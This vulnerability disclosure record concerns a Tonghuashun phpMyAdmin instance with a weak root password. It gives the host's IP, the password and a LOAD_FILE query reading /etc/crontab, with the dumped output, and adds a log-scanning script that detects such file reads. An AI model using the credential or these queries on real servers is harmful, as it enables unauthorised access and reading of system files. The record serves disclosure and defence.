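2016-04-28: Details reported to the vendor; awaiting vendor handling
2016-04-28: Vendor confirmed; details disclosed to the vendor only
2016-05-08: Details disclosed to core white hats and experts in the relevant field
2016-05-18: Details disclosed to regular white hats
2016-05-28: Details disclosed to intern white hats
2016-06-12: Details disclosed to the public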
A Tonghuashun (同花顺) phpMyAdmin instance has a weak root password
http://183.131.12.139:81/phpmyadmin/
root123456
/hxapp/hqserver/ is the marker of a Tonghuashun market-data (quote) server
select load_file('/etc/crontab');
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root ntpdate ntp1.nl.net >/dev/null 2>&1
*/3 8-16 * * 1-5 root sh /home/netstat/update_link_relation.sh > /dev/nul
*/1 * * * * root sh /home/l2log/update_log.sh > /dev/nul
*/1 8-16 * * 1-5 root sh /usr/local/nagios/var/processLog_cp.sh > /dev/nul
00 17 * * * root sh /home/lossreport/loss_report.sh >/dev/null 2>&1
##00 22 * * 1-5 root sh /home/arping/deal_arping_file.sh >/dev/null 2>&1
*/1 * * * * root sh /home/netcheck/netcheck_log.sh >/dev/null 2>&1
##*/1 8-15 * * 1-5 root sh /home/netinfo/fpinglog_check.sh > /dev/nul
#* * * * * root flock -xn /usr/local/nagios/var/log_summary/log_summary.sh /usr/local/nagios/var/log_summary/log_summary.sh >> /tmp/a.txt 2>&1
#00 23 * * * root sh /usr/local/nagios/var/log_summary/nagioslog_backup/nagioslog_backup.sh > /dev/null
00 22 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul
25 17 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul
00 09 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul
*/5 22-23 * * 1-5 root sh /home/arping/arping.sh > /dev/nul
#*/1 * * * 1-5 root sh /home/check_loss/check_loss.sh >/dev/null 2>&1
59 05 * * * root mv /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.6am
#*/1 * * * 1-5 root sh /home/add_realtime_task/add_realtime_task.sh >/dev/null 2>&1
##59 23 * * 0-6 root sh /home/netcheck/netcheck_db_back.sh >/dev/null
##59 23 * * 0-6 root sh /home/netcheck/netstat_db_back.sh >/dev/null
#45 08 * * * root cp /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.am8045
##* * * * * root flock -xn /tmp/1.lock sh /tmp/1.sh
#*/5 * * * * root flock -xn /home/nagios/CheckNagios/SendMail_PollerError.sh sh /home/nagios/CheckNagios/SendMail_PollerError.sh
* * * * * root /usr/local/nagios/var/log_summary/poller_log_filter.sh
*/5 * * * * root sh /home/nagios/CheckNagios/checkNagiosProcess.sh
00 */2 * * * root sh /home/nagios/CheckNagios/checkDebugFile.sh
*/5 * * * 1-5 root sh /home/realtime_check/update_realtime.sh >/dev/null 2>&1
*/30 * * * * root sh /usr/local/nagios/libexec/check_poller_disk > /dev/null
00 05 * * * root sh /hxapp/hqserver/bin/Sf_Disk.sh >/dev/null 2>&1
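A defender-side check for the file read shown above, as an added example that is not part of the original report: it scans a MySQL general query log for LOAD_FILE() calls and attributes each one to the connecting account. The log lines are constructed, and the layout assumed is the MySQL 5.7+ general query log (timestamp, connection id, command, argument) with that log enabled.

```python
import re

# Constructed sample in the MySQL 5.7+ general query log layout
# (timestamp, connection id, command, argument); not data from the report.
SAMPLE_LOG = (
    "2016-04-28T07:10:01.000001Z\t   41 Connect\tapp@10.0.0.5 on shop using TCP/IP\n"
    "2016-04-28T07:10:02.000210Z\t   41 Query\tSELECT id FROM notes WHERE body = 'how does load_file(x) work'\n"
    "2016-04-28T07:10:03.000400Z\t   41 Query\tSELECT LOAD_FILE(\"/var/lib/mysql-files/report.csv\")\n"
    "2016-04-28T07:12:30.000100Z\t   42 Connect\troot@localhost on  using TCP/IP\n"
    "2016-04-28T07:12:31.000300Z\t   42 Query\tselect load_file('/etc/crontab')\n"
    "2016-04-28T07:12:45.000000Z\t   42 Quit\t\n"
)

LINE = re.compile(r"^(\S+)\t\s*(\d+) (\w+)\t(.*)$")
SQ = r"'(?:[^'\\]|\\.|'')*'"   # single-quoted SQL string literal
DQ = r'"(?:[^"\\]|\\.|"")*"'   # double-quoted SQL string literal
# Literals are consumed first, so LOAD_FILE text inside a string is skipped.
TOKEN = re.compile(
    rf"{SQ}|{DQ}|\bload_file\s*\(\s*(?P<arg>{SQ}|{DQ}|[^)]*?)\s*\)", re.IGNORECASE
)


def find_load_file(log_text):
    """Return (timestamp, account, argument) for each LOAD_FILE() call."""
    accounts = {}  # connection id -> user@host from its Connect line
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # header or continuation line
        ts, conn, command, arg = m.groups()
        if command == "Connect":
            accounts[conn] = arg.split(" ", 1)[0]
        elif command == "Quit":
            accounts.pop(conn, None)
        elif command == "Query":
            for tok in TOKEN.finditer(arg):
                if tok.group("arg") is not None:
                    path = tok.group("arg").strip("'\"")
                    findings.append((ts, accounts.get(conn, "unknown"), path))
    return findings


if __name__ == "__main__":
    for ts, account, path in find_load_file(SAMPLE_LOG):
        print(f"{ts} {account} LOAD_FILE({path})")
```

LOAD_FILE() only succeeds for an account holding the FILE privilege and, when secure_file_priv names a directory, only for files inside that directory, so a hit on a path such as /etc/crontab means both settings need review along with the account's password.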
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2016-04-28 15:35
Hello, the vulnerability has been confirmed and is being handled. Thank you.
None yet